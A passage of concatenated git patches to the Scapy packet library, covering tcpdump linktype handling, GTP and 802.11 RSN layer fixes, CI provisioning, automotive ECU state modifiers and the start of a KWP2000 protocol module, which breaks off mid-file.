@@ def tdecode( def _guess_linktype_name(value): # type: (int) -> str """Guess the DLT name from its value.""" - import scapy.data - return next( # type: ignore - k[4:] for k, v in six.iteritems(scapy.data.__dict__) - if k.startswith("DLT") and v == value - ) + from scapy.libs.winpcapy import pcap_datalink_val_to_name + return cast(bytes, pcap_datalink_val_to_name(value)).decode() def _guess_linktype_value(name): # type: (str) -> int """Guess the value of a DLT name.""" - import scapy.data - if not name.startswith("DLT_"): - name = "DLT_" + name - return scapy.data.__dict__[name] # type: ignore + from scapy.libs.winpcapy import pcap_datalink_name_to_val + val = cast(int, pcap_datalink_name_to_val(name.encode())) + if val == -1: + warning("Unknown linktype: %s. Using EN10MB", name) + return DLT_EN10MB + return val @conf.commands.register @@ -2103,8 +2102,6 @@ def tcpdump( raise ValueError("prog must be a string") if linktype is not None: - # Tcpdump does not support integers in -y (yet) - # https://github.com/the-tcpdump-group/tcpdump/issues/758 if isinstance(linktype, int): # Guess name from value try: @@ -2135,8 +2132,12 @@ def tcpdump( if flt is not None: # Check the validity of the filter + if linktype is None and isinstance(pktlist, str): + # linktype is unknown but required. Read it from file + with PcapReader(pktlist) as rd: + linktype = rd.linktype from scapy.arch.common import compile_filter - compile_filter(flt) + compile_filter(flt, linktype=linktype) args.append(flt) stdout = subprocess.PIPE if dump or getfd else None diff --git a/test/regression.uts b/test/regression.uts index 32e16cea153..0f1ad44b82d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2153,6 +2153,14 @@ assert raw(pkt) in f.getvalue() f.close() del f, pkt += Check sniff() offline with linktype & 802.11 filter +~ tcpdump + +fd = get_temp_file() +wrpcap(fd, [RadioTap()/Dot11()/Dot11ProbeReq(), RadioTap()/Dot11()]) +lst = sniff(offline=fd, filter="subtype probe-req") +assert len(lst) == 1 + = Check tcpdump() command rejects non-string input for prog pkt = Ether()/IP()/ICMP() From dcd54d59c94b83632b74e268e8b14026cbcd67c8 Mon Sep 17 00:00:00 2001 From: Raslan Darawsheh Date: Mon, 12 Apr 2021 17:11:18 +0300 Subject: [PATCH 0551/1632] GTP: update GTPPDUSessionContainer (#3130) * gtp: fix GTPPDUSessionContainer layer implementation Signed-off-by: Raslan Darawsheh * Improve PR, add test Co-authored-by: gpotter2 --- scapy/contrib/gtp.py | 122 ++++++++++++++++++++++++++++++------------- test/contrib/gtp.uts | 7 ++- 2 files changed, 91 insertions(+), 38 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index bf369847ec5..108fdf0d87c 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -19,14 +19,29 @@ from __future__ import absolute_import import struct - from scapy.compat import chb, orb, bytes_encode from scapy.config import conf from scapy.error import warning -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ - IPField, PacketListField, ShortField, StrFixedLenField, StrLenField, \ - XBitField, XByteField, XIntField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + FlagsField, + IPField, + IntField, + PacketListField, + ShortField, + StrFixedLenField, + StrLenField, + X3BytesField, + XBitField, + XByteField, + XIntField, +) from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.ppp import PPP @@ -313,56 +328,80 @@ def guess_payload_class(self, payload): class GTPPDUSessionContainer(Packet): + # TS 38.415-g30 sect 5 name = "GTP PDU Session Container" + deprecated_fields = { + "qmp": ("QMP", "2.4.5"), + "P": ("PPP", "2.4.5"), + "R": ("RQI", "2.4.5"), + "extraPadding": ("padding", "2.4.5"), + } fields_desc = [ByteField("ExtHdrLen", None), - BitField("type", 0, 4), - BitField("qmp", 0, 1), + BitEnumField("type", 0, 4, + {0: "DL PDU SESSION INFORMATION", + 1: "UL PDU SESSION INFORMATION"}), + BitField("QMP", 0, 1), + # UL (type 1) ConditionalField(BitField("dlDelayInd", 0, 1), lambda pkt: pkt.type == 1), ConditionalField(BitField("ulDelayInd", 0, 1), lambda pkt: pkt.type == 1), - ConditionalField(BitField("spareUl1", 0, 1), + # Common + BitField("SNP", 0, 1), + # UL (type 1) + ConditionalField(BitField("N3N9DelayInd", 0, 1), + lambda pkt: pkt.type == 1), + ConditionalField(XBitField("spareUl1", 0, 1), lambda pkt: pkt.type == 1), - ConditionalField(XBitField("spareDl1", 0, 3), + # DL (type 0) + ConditionalField(XBitField("spareDl1", 0, 2), lambda pkt: pkt.type == 0), - ConditionalField(BitField("P", 0, 1), + ConditionalField(BitField("PPP", 0, 1), lambda pkt: pkt.type == 0), - ConditionalField(BitField("R", 0, 1), + ConditionalField(BitField("RQI", 0, 1), lambda pkt: pkt.type == 0), - ConditionalField(XBitField("spareUl2", 0, 2), - lambda pkt: pkt.type == 1), - BitField("QFI", 0, 6), + # Common + BitField("QFI", 0, 6), # QoS Flow Identifier + # DL (type 0) ConditionalField(XBitField("PPI", 0, 3), lambda pkt: pkt.type == 0 and - pkt.P == 1), + pkt.PPP == 1), ConditionalField(XBitField("spareDl2", 0, 5), lambda pkt: pkt.type == 0 and - pkt.P == 1), - ConditionalField(XBitField("dlSendTime", 0, 32), + pkt.PPP == 1), + ConditionalField(XBitField("dlSendTime", 0, 64), + lambda pkt: pkt.type == 0 and + pkt.QMP == 1), + ConditionalField(X3BytesField("dlQFISeqNum", 0), lambda pkt: pkt.type == 0 and - pkt.qmp == 1), - ConditionalField(XBitField("dlSendTimeRpt", 0, 32), + pkt.SNP == 1), + # UL (type 1) + ConditionalField(XBitField("dlSendTimeRpt", 0, 64), lambda pkt: pkt.type == 1 and - pkt.qmp == 1), - ConditionalField(XBitField("dlRecvTime", 0, 32), + pkt.QMP == 1), + ConditionalField(XBitField("dlRecvTime", 0, 64), lambda pkt: pkt.type == 1 and - pkt.qmp == 1), - ConditionalField(XBitField("ulSendTime", 0, 32), + pkt.QMP == 1), + ConditionalField(XBitField("ulSendTime", 0, 64), lambda pkt: pkt.type == 1 and - pkt.qmp == 1), + pkt.QMP == 1), ConditionalField(XBitField("dlDelayRslt", 0, 32), lambda pkt: pkt.type == 1 and pkt.dlDelayInd == 1), ConditionalField(XBitField("ulDelayRslt", 0, 32), lambda pkt: pkt.type == 1 and pkt.ulDelayInd == 1), + ConditionalField(XBitField("UlQFISeqNum", 0, 24), + lambda pkt: pkt.type == 1 and + pkt.SNP == 1), + ConditionalField(XBitField("N3N9DelayRslt", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.N3N9DelayInd == 1), + # Common ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), - ConditionalField(StrLenField( - "extraPadding", - "", - length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 5), - lambda pkt:pkt.ExtHdrLen and pkt.ExtHdrLen > 1 and - pkt.type == 0 and pkt.P == 1 and pkt.NextExtHdr == 0)] + ConditionalField( + StrLenField("padding", b"", length_from=lambda p: 0), + lambda pkt: pkt.NextExtHdr == 0)] def guess_payload_class(self, payload): if self.NextExtHdr == 0: @@ -375,15 +414,24 @@ def guess_payload_class(self, payload): return PPP return GTPHeader.guess_payload_class(self, payload) + def post_dissect(self, s): + if self.NextExtHdr == 0: + # Padding is handled in this layer + length = len(self.original) - len(s) + pad_length = (- length) % 4 + self.padding = s[:pad_length] + return s[pad_length:] + return s + def post_build(self, p, pay): - p += pay + # Length + if self.NextExtHdr == 0: + p += b"\x00" * ((-len(p)) % 4) + else: + pay += b"\x00" * ((-len(p + pay)) % 4) if self.ExtHdrLen is None: - if self.P == 1: - hdr_len = 2 - else: - hdr_len = 1 - p = struct.pack("!B", hdr_len) + p[1:] - return p + p = struct.pack("!B", len(p) // 4) + p[1:] + return p + pay class GTPEchoRequest(Packet): diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 078db75fb65..569528a9cd7 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -55,7 +55,12 @@ assert isinstance(a[GTP_U_Header].payload, PPP) = GTPPDUSessionContainer(), dissect h = 'fa163ed6de7bfa163ed82b9408004500008400000000fe114b560a0a2e010a0a2efe086808680070000034ff006000000001fa163e850200ff800000000045000054074d00004001fb490a0a31fe0a0a32010000325600930001c444ca5f00000000759e0a0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637' gtp = Ether(hex_bytes(h)) -gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].extraPadding == b'\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.49.254' and gtp[GTP_U_Header][IP][ICMP].type == 0 and gtp[GTP_U_Header].type == 0 and gtp[GTP_U_Header].qmp == 0 and gtp[GTP_U_Header].P == 1 and gtp[GTP_U_Header].R == 1 and gtp[GTP_U_Header].QFI == 63 and gtp[GTP_U_Header].PPI == 4 +gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].padding == b'\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.49.254' and gtp[GTP_U_Header][IP][ICMP].type == 0 and gtp[GTP_U_Header].type == 0 and gtp[GTP_U_Header].qmp == 0 and gtp[GTP_U_Header].P == 1 and gtp[GTP_U_Header].R == 1 and gtp[GTP_U_Header].QFI == 63 and gtp[GTP_U_Header].PPI == 4 + += GTPPDUSessionContainer with padding +data = b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00^\x00\x01\x00\x00@\x11|\x8c\x7f\x00\x00\x01\x7f\x00\x00\x01\x08h\x08h\x00J\xed^4\xff\x00:\x00\x00\x00\x00\x00\x00\x00\x85\x04\x08\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00\x00&\x00\x01\x00\x00@\x11|\xc4\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x12\x01^ffffffffff000' +gtp = Ether(data) +assert IP in gtp = GTPEchoResponse matches GTPEchoRequest by seq req = GTPHeader(seq=12345)/GTPEchoRequest() From 75e07e31cd096d1bce5efe7d8f2348207fbce29e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 27 Mar 2021 23:43:11 +0100 Subject: [PATCH 0552/1632] Improve GroupManagementCipherSuite detection --- scapy/layers/dot11.py | 21 ++++++++++++++++----- test/scapy/layers/dot11.uts | 11 ++++++++++- 2 files changed, 26 insertions(+), 6 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index de35c19c212..5e89c1cf227 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1185,17 +1185,20 @@ class Dot11EltRSN(Dot11Elt): AKMSuite, count_from=lambda p: p.nb_akm_suites ), - BitField("mfp_capable", 0, 1), - BitField("mfp_required", 0, 1), + BitField("mfp_capable", 1, 1), + BitField("mfp_required", 1, 1), BitField("gtksa_replay_counter", 0, 2), BitField("ptksa_replay_counter", 0, 2), BitField("no_pairwise", 0, 1), BitField("pre_auth", 0, 1), BitField("reserved", 0, 8), + # Theorically we could use mfp_capable/mfp_required to know if those + # fields are present, but some implementations poorly implement it. + # In practice, do as wireshark: guess using offset. ConditionalField( - PacketField("pmkids", None, PMKIDListPacket), + PacketField("pmkids", PMKIDListPacket(), PMKIDListPacket), lambda pkt: ( - 0 if pkt.len is None else + True if pkt.len is None else pkt.len - ( 12 + (pkt.nb_pairwise_cipher_suites or 0) * 4 + @@ -1206,7 +1209,15 @@ class Dot11EltRSN(Dot11Elt): ConditionalField( PacketField("group_management_cipher_suite", RSNCipherSuite(cipher=0x6), RSNCipherSuite), - lambda pkt: pkt.mfp_capable == 1 + lambda pkt: ( + True if pkt.len is None else + pkt.len - ( + 12 + + (pkt.nb_pairwise_cipher_suites or 0) * 4 + + (pkt.nb_akm_suites or 0) * 4 + + (pkt.pmkids and pkt.pmkids.nb_pmkids or 0) * 16 + ) >= 2 + ) ) ] diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 7f822280725..d7c00bd7014 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -196,7 +196,15 @@ assert len(pmkids.pmkid_list) == 1 assert pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' = Dot11EltRSN -assert bytes(Dot11EltRSN()) == b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00' +assert bytes( + Dot11EltRSN(group_cipher_suite=RSNCipherSuite(), + pairwise_cipher_suites=[RSNCipherSuite()], + akm_suites=[AKMSuite()], + pmkids=PMKIDListPacket(), + group_management_cipher_suite=RSNCipherSuite(cipher=6)) +) == b'0\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\xc0\x00\x00\x00\x00\x0f\xac\x06' + +# No pmkids, no group management cipher suite rsn_ie = Dot11EltRSN(b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x01\x00') assert rsn_ie.group_cipher_suite.cipher == 0x04 assert rsn_ie.nb_pairwise_cipher_suites == 0x01 @@ -206,6 +214,7 @@ assert rsn_ie.akm_suites[0].suite == 0x01 assert rsn_ie.pre_auth assert Dot11Elt in rsn_ie +# pmkids, group management cipher suite pkt = RadioTap(b"\x00\x000\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x00\x00\x00\x00\x0bpin;%\xedN\x10\x0cl\t\xc0\x00\xce\x00\x00\x00\xb2\x00\xbd\x01\xce\x02\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\xec\x17/\x82\x1e)\xec\x17/\x82\x1e)\x10p\x81a\xa1\x08\x00\x00\x00\x00d\x001\x04\x00\rROUTE-821E295\x01\x01\x8c\x03\x01\x01\x05\x04\x00\x02\x00\x00\x07$IL \x01\x01\x14\x02\x01\x14\x03\x01\x14\x04\x01\x14\x05\x01\x14\x06\x01\x14\x07\x01\x14\x08\x01\x14\t\x01\x14\n\x01\x14\x0b\x01\x14;\x12QQRSTstuvwxyz{}~\x7f\x80*\x01\x000\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x8c\x00\x00\x00\x00\x0f\xac\x06-\x1a\x8d\x01\x1f\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00'\xa4\x00\x00BT^\x00a2/\x00\x7f\x01\x04\xdd\x07\x00\xa0\xc6\x02\x02\x03\x00\xdd\x17\xec\x17/RRRRRRRRRRRRRRRRRRRRR\x9e[\xf2") assert Dot11EltRSN in pkt pkt[Dot11Beacon].network_stats() From d680d279a9fd37629d5116433af34429a8095576 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 13 Apr 2021 15:09:16 +0200 Subject: [PATCH 0553/1632] Add -H to scapy.1 --- doc/scapy.1 | 3 +++ doc/scapy/usage.rst | 2 +- scapy/main.py | 5 +++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/doc/scapy.1 b/doc/scapy.1 index c385039a890..f926cb3015b 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -41,6 +41,9 @@ Options for Scapy are: \fB\-h\fR display usage .TP +\fB\-H\fR +header-less mode, also reduces verbosity. +.TP \fB\-d\fR increase log verbosity. Can be used many times. .TP diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index b00523e7818..7ebb5c952fc 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -8,7 +8,7 @@ Starting Scapy Scapy's interactive shell is run in a terminal session. Root privileges are needed to send the packets, so we're using ``sudo`` here:: - $ sudo ./scapy + $ sudo scapy -H Welcome to Scapy (2.4.0) >>> diff --git a/scapy/main.py b/scapy/main.py index b381df5e887..62a3cdfd579 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -96,7 +96,7 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), Manual loading: >>> _read_config_file("./config.py")) >>> conf.verb - 42 + 2 """ log_loading.debug("Loading config file [%s]", cf) @@ -520,7 +520,8 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): _usage() elif opt == "-H": conf.fancy_prompt = False - conf.verb = 30 + conf.verb = 1 + conf.logLevel = logging.WARNING elif opt == "-s": session_name = param elif opt == "-c": From a91babb50ff35696ec5cdaa6001ac353fdcf8614 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 18 Apr 2021 19:33:32 +0200 Subject: [PATCH 0554/1632] Fix BitField doc fixes https://github.com/secdev/scapy/issues/3176 --- scapy/fields.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 9ce93628e81..d8de2d1ba11 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2125,9 +2125,9 @@ class TestPacket(Packet): class TestPacket(Packet): fields_desc = [ - BitField("a", 0, 9, tot_size=-16), + BitField("a", 0, 9, tot_size=-2), BitField("b", 0, 2), - BitField("c", 0, 5, end_tot_size=-16) + BitField("c", 0, 5, end_tot_size=-2) ] """ From 06b7d51722da3bef7b4f3fa301d9c9e876507f6d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 18 Apr 2021 20:28:11 +0200 Subject: [PATCH 0555/1632] Use FreeBSD 13 --- doc/vagrant_ci/Vagrantfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index 13d27407e05..b4d5021d3c9 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -14,7 +14,7 @@ Vagrant.configure("2") do |config| end config.vm.define "freebsd" do |bsd| - bsd.vm.box = "freebsd/FreeBSD-12.1-STABLE" + bsd.vm.box = "freebsd/FreeBSD-13.0-RELEASE" bsd.vm.provision "shell", path: "provision_freebsd.sh" end From 68de8936287dd96918551be6532ae0eb713324e5 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 18 Apr 2021 20:33:06 +0200 Subject: [PATCH 0556/1632] NetBSD provisioning fixed --- doc/vagrant_ci/provision_netbsd.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/vagrant_ci/provision_netbsd.sh b/doc/vagrant_ci/provision_netbsd.sh index 4dcfe8dabd6..439a2f8047c 100644 --- a/doc/vagrant_ci/provision_netbsd.sh +++ b/doc/vagrant_ci/provision_netbsd.sh @@ -12,10 +12,10 @@ unset PROMPT_COMMAND export PATH="/sbin:/usr/pkg/sbin:/usr/pkg/bin:$PATH" export PKG_PATH="http://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/amd64/${RELEASE}/All/" pkg_delete curl -pkg_add git python27 python38 py27-virtualenv py27-sqlite3 py38-sqlite3 py38-expat rust mozilla-rootcerts-openssl +pkg_add git python27 python38 py38-virtualenv py27-sqlite3 py38-sqlite3 py38-expat rust mozilla-rootcerts-openssl git clone https://github.com/secdev/scapy cd scapy -virtualenv-2.7 venv +virtualenv-3.8 venv . venv/bin/activate pip install tox chown -R vagrant:vagrant ../scapy/ From 876d1967fb4bad250644e6252e476d890f2ec502 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 18 Apr 2021 20:36:15 +0200 Subject: [PATCH 0557/1632] OpenBSD tcpdump does not support 'subtype prob-req' --- test/regression.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index 0f1ad44b82d..0a169e804a2 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2154,7 +2154,7 @@ f.close() del f, pkt = Check sniff() offline with linktype & 802.11 filter -~ tcpdump +~ tcpdump linux fd = get_temp_file() wrpcap(fd, [RadioTap()/Dot11()/Dot11ProbeReq(), RadioTap()/Dot11()]) From 447f477cc409f12d17af184f51b77e10dadec79f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 16 Mar 2021 11:38:02 +0100 Subject: [PATCH 0558/1632] Split #3054: Minor additions to EcuState modifications --- scapy/contrib/automotive/ecu.py | 23 +++++++++++++--- .../contrib/automotive/gm/gmlan_ecu_states.py | 2 ++ scapy/contrib/automotive/uds_ecu_states.py | 27 ++++++++++++++++++- 3 files changed, 47 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 4616ede228e..e8eab1c7d42 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -23,6 +23,7 @@ from scapy.ansmachine import AnsweringMachine from scapy.config import conf from scapy.supersocket import SuperSocket +from scapy.error import Scapy_Exception __all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", @@ -42,6 +43,10 @@ def __init__(self, **kwargs): v = list(v) self.__setattr__(k, v) + def __len__(self): + # type: () -> int + return len(self.__dict__.keys()) + def __getitem__(self, item): # type: (str) -> Any return self.__dict__[item] @@ -88,10 +93,10 @@ def __lt__(self, other): if self == other: return False - if len(self.__dict__.keys()) < len(other.__dict__.keys()): + if len(self) < len(other): return True - if len(self.__dict__.keys()) > len(other.__dict__.keys()): + if len(self) > len(other): return False common = set(self.__dict__.keys()).intersection( @@ -147,6 +152,13 @@ def extend_pkt_with_modifier(cls): :param cls: A packet class to be modified :return: Decorator function """ + if len(cls.fields_desc) == 0: + raise Scapy_Exception("Packets without fields can't be extended.") + + if hasattr(cls, "modify_ecu_state"): + raise Scapy_Exception( + "Class already extended. Can't override existing method.") + def decorator_function(f): # type: (Callable[[Packet, Packet, EcuState], None]) -> None setattr(cls, "modify_ecu_state", f) @@ -562,8 +574,8 @@ class EcuAnsweringMachine(AnsweringMachine): def parse_options(self, supported_responses=None, main_socket=None, broadcast_socket=None, basecls=Raw, - timeout=None): - # type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]]) -> None # noqa: E501 + timeout=None, initial_ecu_state=None): + # type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]], Optional[EcuState]) -> None # noqa: E501 """ :param supported_responses: List of ``EcuResponse`` objects to define the behaviour. The default response is @@ -586,6 +598,9 @@ def parse_options(self, supported_responses=None, if broadcast_socket is not None: self.__sockets.append(broadcast_socket) + if initial_ecu_state: + self.__ecu_state = initial_ecu_state + self.__basecls = basecls # type: Type[Packet] self.__supported_responses = supported_responses diff --git a/scapy/contrib/automotive/gm/gmlan_ecu_states.py b/scapy/contrib/automotive/gm/gmlan_ecu_states.py index 6d9e40bf053..be4bde4f68f 100644 --- a/scapy/contrib/automotive/gm/gmlan_ecu_states.py +++ b/scapy/contrib/automotive/gm/gmlan_ecu_states.py @@ -10,6 +10,8 @@ from scapy.contrib.automotive.ecu import EcuState from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SAPR +__all__ = ["GMLAN_modify_ecu_state", "GMLAN_SAPR_modify_ecu_state"] + @EcuState.extend_pkt_with_modifier(GMLAN) def GMLAN_modify_ecu_state(self, req, state): diff --git a/scapy/contrib/automotive/uds_ecu_states.py b/scapy/contrib/automotive/uds_ecu_states.py index 90800f443d6..5315a1b8f1c 100644 --- a/scapy/contrib/automotive/uds_ecu_states.py +++ b/scapy/contrib/automotive/uds_ecu_states.py @@ -7,11 +7,17 @@ # scapy.contrib.status = library from scapy.contrib.automotive.uds import UDS_DSCPR, UDS_ERPR, UDS_SAPR, \ - UDS_RDBPIPR, UDS_CCPR, UDS_TPPR + UDS_RDBPIPR, UDS_CCPR, UDS_TPPR, UDS_RDPR, UDS from scapy.packet import Packet from scapy.contrib.automotive.ecu import EcuState +__all__ = ["UDS_DSCPR_modify_ecu_state", "UDS_CCPR_modify_ecu_state", + "UDS_ERPR_modify_ecu_state", "UDS_RDBPIPR_modify_ecu_state", + "UDS_TPPR_modify_ecu_state", "UDS_SAPR_modify_ecu_state", + "UDS_RDPR_modify_ecu_state"] + + @EcuState.extend_pkt_with_modifier(UDS_DSCPR) def UDS_DSCPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None @@ -48,3 +54,22 @@ def UDS_TPPR_modify_ecu_state(self, req, state): def UDS_RDBPIPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None state.pdid = self.periodicDataIdentifier # type: ignore + + +@EcuState.extend_pkt_with_modifier(UDS_RDPR) +def UDS_RDPR_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + oldstr = getattr(state, "req_download", "") + newstr = str(req.fields) + state.req_download = oldstr if newstr in oldstr else oldstr + newstr # type: ignore # noqa: E501 + + +@EcuState.extend_pkt_with_modifier(UDS) +def UDS_modify_ecu_state(self, req, state): + # type: (Packet, Packet, EcuState) -> None + if self.service == 0x77: # UDS RequestTransferExitPositiveResponse + try: + state.download_complete = state.req_download # type: ignore + except (KeyError, AttributeError): + pass + state.req_download = "" # type: ignore From 18b71dd8c22258b92613ac1593e1d357a7acbbe6 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 20 Apr 2021 00:42:24 +0200 Subject: [PATCH 0559/1632] Implementation of KWP2000 (#3120) --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/automotive/kwp.py | 992 ++++++++++++++++++++++++++++++++ test/contrib/automotive/kwp.uts | 509 ++++++++++++++++ 3 files changed, 1502 insertions(+) create mode 100644 scapy/contrib/automotive/kwp.py create mode 100644 test/contrib/automotive/kwp.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index e85cfc3d9d2..d02f3dadbae 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -48,3 +48,4 @@ scapy/contrib/automotive/gm/gmlan_ecu_states.py scapy/contrib/automotive/gm/gmlan_logging.py scapy/contrib/automotive/bmw/hsfz.py scapy/contrib/automotive/doip.py +scapy/contrib/automotive/kwp.py diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py new file mode 100644 index 00000000000..55730629fdd --- /dev/null +++ b/scapy/contrib/automotive/kwp.py @@ -0,0 +1,992 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Keyword Protocol 2000 (KWP2000) / ISO 14230 +# scapy.contrib.status = loads + +import struct +import time + +from scapy.fields import ByteEnumField, StrField, ConditionalField, \ + BitField, XByteField, X3BytesField, ByteField, \ + ObservableDict, XShortEnumField, XByteEnumField +from scapy.packet import Packet, bind_layers, NoPayload +from scapy.config import conf +from scapy.error import log_loading +from scapy.utils import PeriodicSenderThread +from scapy.plist import _PacketIterable +from scapy.contrib.isotp import ISOTP +from scapy.compat import Dict, Any + + +try: + if conf.contribs['KWP']['treat-response-pending-as-answer']: + pass +except KeyError: + log_loading.info("Specify \"conf.contribs['KWP'] = " + "{'treat-response-pending-as-answer': True}\" to treat " + "a negative response 'requestCorrectlyReceived-" + "ResponsePending' as answer of a request. \n" + "The default value is False.") + conf.contribs['KWP'] = {'treat-response-pending-as-answer': False} + + +class KWP(ISOTP): + services = ObservableDict( + {0x10: 'StartDiagnosticSession', + 0x11: 'ECUReset', + 0x14: 'ClearDiagnosticInformation', + 0x17: 'ReadStatusOfDiagnosticTroubleCodes', + 0x18: 'ReadDiagnosticTroubleCodesByStatus', + 0x1A: 'ReadECUIdentification', + 0x21: 'ReadDataByLocalIdentifier', + 0x22: 'ReadDataByIdentifier', + 0x23: 'ReadMemoryByAddress', + 0x27: 'SecurityAccess', + 0x28: 'DisableNormalMessageTransmission', + 0x29: 'EnableNormalMessageTransmission', + 0x2C: 'DynamicallyDefineLocalIdentifier', + 0x2E: 'WriteDataByIdentifier', + 0x30: 'InputOutputControlByLocalIdentifier', + 0x31: 'StartRoutineByLocalIdentifier', + 0x32: 'StopRoutineByLocalIdentifier', + 0x33: 'RequestRoutineResultsByLocalIdentifier', + 0x34: 'RequestDownload', + 0x35: 'RequestUpload', + 0x36: 'TransferData', + 0x37: 'RequestTransferExit', + 0x3B: 'WriteDataByLocalIdentifier', + 0x3D: 'WriteMemoryByAddress', + 0x3E: 'TesterPresent', + 0x85: 'ControlDTCSetting', + 0x86: 'ResponseOnEvent', + 0x50: 'StartDiagnosticSessionPositiveResponse', + 0x51: 'ECUResetPositiveResponse', + 0x54: 'ClearDiagnosticInformationPositiveResponse', + 0x57: 'ReadStatusOfDiagnosticTroubleCodesPositiveResponse', + 0x58: 'ReadDiagnosticTroubleCodesByStatusPositiveResponse', + 0x5A: 'ReadECUIdentificationPositiveResponse', + 0x61: 'ReadDataByLocalIdentifierPositiveResponse', + 0x62: 'ReadDataByIdentifierPositiveResponse', + 0x63: 'ReadMemoryByAddressPositiveResponse', + 0x67: 'SecurityAccessPositiveResponse', + 0x68: 'DisableNormalMessageTransmissionPositiveResponse', + 0x69: 'EnableNormalMessageTransmissionPositiveResponse', + 0x6C: 'DynamicallyDefineLocalIdentifierPositiveResponse', + 0x6E: 'WriteDataByIdentifierPositiveResponse', + 0x70: 'InputOutputControlByLocalIdentifierPositiveResponse', + 0x71: 'StartRoutineByLocalIdentifierPositiveResponse', + 0x72: 